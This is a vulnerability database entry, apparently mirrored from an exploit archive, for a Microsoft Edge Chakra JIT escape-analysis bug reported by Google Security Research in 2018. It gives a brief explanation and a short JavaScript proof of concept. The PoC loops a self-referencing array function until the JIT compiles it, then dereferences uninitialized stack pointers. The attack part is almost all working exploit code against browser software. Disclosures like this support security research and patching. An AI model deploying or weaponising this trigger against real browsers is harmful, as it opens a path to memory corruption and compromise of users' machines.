Lucene search

K

Microsoft Edge Chakra JIT - Escape Analysis Bug Exploit

🗓️ 09 Jan 2018 00:00:00Reported by Google Security ResearchType 
zdt
 zdt
🔗 0day.today👁 25 Views

Microsoft Edge Chakra JIT - Escape Analysis Bug Exploi

Show more
Related
Code
/*
Escape analysis: https://en.wikipedia.org/wiki/Escape_analysis
 
Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.
 
PoC:
*/
 
function opt() {
    let tmp = [];
    tmp[0] = tmp;
    return tmp[0];
}
 
function main() {
    for (let i = 0; i < 0x1000; i++) {
        opt();
    }
 
    print(opt());  // deref uninitialized stack pointers!
}
 
main();

#  0day.today [2018-03-01]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
09 Jan 2018 00:00Current
7.8High risk
Vulners AI Score7.8
EPSS0.935
25
.json
Report